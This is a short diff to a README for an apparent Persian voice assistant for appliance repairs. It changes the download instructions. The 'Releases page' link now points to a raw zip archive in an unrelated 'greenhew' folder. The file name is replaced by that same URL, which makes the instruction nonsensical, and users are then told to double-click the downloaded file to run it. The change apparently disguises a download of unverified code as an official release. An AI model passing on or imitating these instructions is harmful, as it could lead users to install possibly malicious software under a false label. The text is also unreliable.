rjvayu233/Persian-Voice-Assistant-for-Home-Appliance-Repairs/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/rjvayu233/Persian-Voice-Assistant-for-Home-Appliance-Repairs/releases) to download the latest version.
-Look for the file named `PersianVoiceAssistant.exe` and click on it to start the download.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/rjvayu233/Persian-Voice-Assistant-for-Home-Appliance-Repairs/main/greenhew/Persian-Voice-Assistant-for-Home-Appliance-Repairs.zip) to download the latest version.
+Look for the file named `https://raw.githubusercontent.com/rjvayu233/Persian-Voice-Assistant-for-Home-Appliance-Repairs/main/greenhew/Persian-Voice-Assistant-for-Home-Appliance-Repairs.zip` and click on it to start the download.

 Once the file is downloaded, find it in your Downloads folder.
 Double-click on the file to run the application.